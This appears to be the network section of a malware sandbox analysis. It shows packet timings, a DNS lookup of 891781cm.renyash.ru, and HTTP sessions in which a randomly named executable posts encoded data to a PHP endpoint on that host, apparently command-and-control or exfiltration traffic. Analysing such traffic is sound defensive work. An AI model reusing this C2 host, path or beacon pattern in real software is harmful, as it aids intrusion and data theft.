                                                                                                                  Jan 1, 2025 15:05:34.824615002 CET5028980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:34.874809027 CET8050289104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:34.932612896 CET5028980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:34.989023924 CET5028980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:34.992619991 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:34.994029045 CET8050289104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:34.996718884 CET5028980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:34.997432947 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:34.997577906 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.000623941 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.005373001 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.353640079 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.358432055 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.441711903 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.505821943 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.616364002 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.728545904 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.771528959 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.772141933 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.776952982 CET8050290104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.776969910 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:35.777003050 CET5029080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.777075052 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.777187109 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:35.782159090 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.187098026 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.191987038 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.234538078 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.292633057 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.448019981 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.496623039 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.536345959 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.588617086 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.660870075 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.661576986 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.668853998 CET8050291104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.668865919 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:36.668972969 CET5029180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.669039011 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.669169903 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:36.673867941 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:37.025548935 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:37.030411959 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:37.122517109 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:37.246128082 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:37.301306963 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:37.351926088 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:37.429884911 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:37.430685997 CET5029380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:37.435022116 CET8050292104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:37.435067892 CET5029280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.392818928 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.397655010 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.744672060 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.749540091 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.898729086 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.948661089 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.979701042 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.980664968 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.984829903 CET8050308104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.985279083 CET5030880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.985455036 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:48.985572100 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.985729933 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:48.990500927 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.100655079 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.105568886 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.108742952 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.108834028 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.113670111 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.338123083 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.343075991 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.343163967 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.430078030 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.463104010 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.468003988 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.478585005 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.562329054 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.603590965 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.681708097 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.728590012 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.815809011 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.869237900 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942660093 CET5026580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942717075 CET5030580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.942770004 CET5027280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.943470955 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.943624020 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.944159985 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949012041 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949023008 CET8050309104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949033976 CET8050310104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:49.949105024 CET5030980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949116945 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949152946 CET5031080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.949246883 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:49.953975916 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.308670998 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.313584089 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.415116072 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.464668036 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.692413092 CET8050311104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.748491049 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.820678949 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.825558901 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:50.825659990 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.828669071 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:50.833515882 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.184670925 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.189558029 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.430917025 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.478591919 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.696489096 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.744230032 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.871174097 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.872036934 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.876326084 CET8050312104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.876373053 CET5031280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.876950979 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:51.877011061 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.877151012 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:51.881966114 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.228779078 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.233804941 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.332365036 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.384862900 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.516904116 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.572679996 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.648678064 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.648677111 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653502941 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.653702974 CET8050313104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:52.653812885 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653815985 CET5031380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.653945923 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:52.659020901 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.012679100 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.017553091 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.115154982 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.166188955 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.288244009 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.337979078 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.412583113 CET5031180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.415673971 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.417169094 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.420722008 CET8050314104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.420772076 CET5031480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.421981096 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.422045946 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.422261000 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.427018881 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.776524067 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:53.781856060 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.863800049 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:53.916107893 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.130743027 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.181727886 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.256679058 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.256686926 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.261650085 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.261868000 CET8050315104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.264825106 CET5031580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.264826059 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.264964104 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.269735098 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.620696068 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.625713110 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.700681925 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.700690985 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.705584049 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.705818892 CET8050316104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.705912113 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.705914021 CET5031680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.706100941 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.710903883 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.820899963 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.825754881 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:54.828766108 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.828851938 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:54.833620071 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.060693979 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.065697908 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.065757036 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.158133030 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.181925058 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.186816931 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.212979078 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.282248020 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.322381973 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.414653063 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.463068008 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.543432951 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.587990999 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.663834095 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.663930893 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.664887905 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.668869972 CET8050317104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.668919086 CET5031780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669209003 CET8050318104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.669251919 CET5031880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669728041 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:55.669787884 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.669874907 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:55.674633026 CET8050319104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:05:56.025616884 CET5031980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:05:56.030534029 CET8050319104.21.38.84192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 15:02:11.104135990 CET | 54763 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 15:02:11.114093065 CET | 53 | 54763 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 15:02:11.104135990 CET | 192.168.2.4 | 1.1.1.1 | 0xcd90 | Standard query (0) | 891781cm.renyash.ru | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 15:02:11.114093065 CET | 1.1.1.1 | 192.168.2.4 | 0xcd90 | No error (0) | 891781cm.renyash.ru | | 104.21.38.84 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 15:02:11.114093065 CET | 1.1.1.1 | 192.168.2.4 | 0xcd90 | No error (0) | 891781cm.renyash.ru | | 172.67.220.198 | A (IP address) | IN (0x0001) | false
                                                                                                                  • 891781cm.renyash.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:11.170650005 CET | 343 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:11.525337934 CET | 344 | OUT | Data Raw: 05 02 04 05 06 0e 01 03 05 06 02 01 02 01 01 05 00 00 05 08 02 05 03 0d 03 05 0e 04 07 00 01 08 0d 52 06 00 00 0c 06 07 0b 0a 06 0a 05 54 05 56 03 03 0e 0b 0a 00 06 0a 07 02 03 0c 04 55 07 5a 02 01 0a 09 05 01 04 54 0c 0f 0e 05 0d 0d 0f 05 06 0d
                                                                                                                  Data Ascii: RTVUZT\L~p[Zw~\ul@R\]`ltL~soXoRsJlYbhSSvg|Lj_~V@{SzA}be
Jan 1, 2025 15:02:11.627216101 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:11.909101963 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnCUxKGwD0i1cktRzqYp7nCHlbo7BNjJwU8lEmVrcz6czSgixg49gLGeygTlQ2EUaUQew3hwSSYENHsaQVgbZuMmY2aQ9VP%2BUzro2wbl3z0L0uN0n4ttrDIc31%2Brhvj1k7If2gQT"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bae680f5e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3324&min_rtt=1612&rtt_var=4028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=687&delivery_rate=95368&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 1, 2025 15:02:11.943018913 CET | 319 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:02:12.040903091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:12.041290045 CET384OUTData Raw: 50 55 5d 56 5a 5a 51 55 55 5a 54 59 51 5d 55 5d 58 5f 5c 5a 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]VZZQUUZTYQ]U]X_\ZYSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Z#%-9(>+_$$)- X3*Q$<_/(](S><#^!'^)?
Jan 1, 2025 15:02:12.296453953 CET | 965 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ly0xDUlVn8bbkVWf%2BkU8nSORKWaJ%2Bo8S%2BmVSe7aYq%2FSGvWEPLTZtXF1K1GL1%2FmAzMbiTR1Ngbr8HkUHJw7sxdY2T6dMIF%2F7p0PGP7S6bVzFqcC6XnbLAAN%2F7xjfHMHex6jwOJuf5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb0fa4f5e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5696&min_rtt=1612&rtt_var=7716&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2209&recv_bytes=1390&delivery_rate=2559906&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 24 02 27 14 28 07 36 58 2d 3c 30 0e 31 3c 22 5e 25 33 24 1d 24 2d 39 14 3a 2b 23 04 3f 3b 30 06 26 5c 21 12 34 31 21 02 32 0c 2e 5d 04 1d 26 03 3f 2a 00 14 28 3f 0c 00 3d 22 0d 07 24 19 24 05 31 34 0e 13 30 13 08 5c 21 0b 27 55 33 0d 2f 0f 2b 2a 2f 13 27 3e 3d 08 23 00 2e 57 0d 12 22 1e 26 10 39 57 29 1f 01 0a 22 3f 33 1f 27 01 0a 0c 24 2c 0e 1f 20 38 0c 10 3e 2f 01 00 22 09 25 56 24 04 27 13 22 17 2d 1e 22 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"$'(6X-<01<"^%3$$-9:+#?;0&\!41!2.]&?*(?="$$140\!'U3/+*/'>=#.W"&9W)"?3'$, 8>/"%V$'"-""T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:12.676310062 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1792
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:13.024851084 CET1792OUTData Raw: 55 52 5d 50 5f 5a 51 5a 55 5a 54 59 51 52 55 50 58 52 5c 55 59 5d 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]P_ZQZUZTYQRUPXR\UY]R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(X#]%_&>6*.70$U-$&'<'_,.<.8V><#^!'^)
Jan 1, 2025 15:02:13.124960899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:13.397224903 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
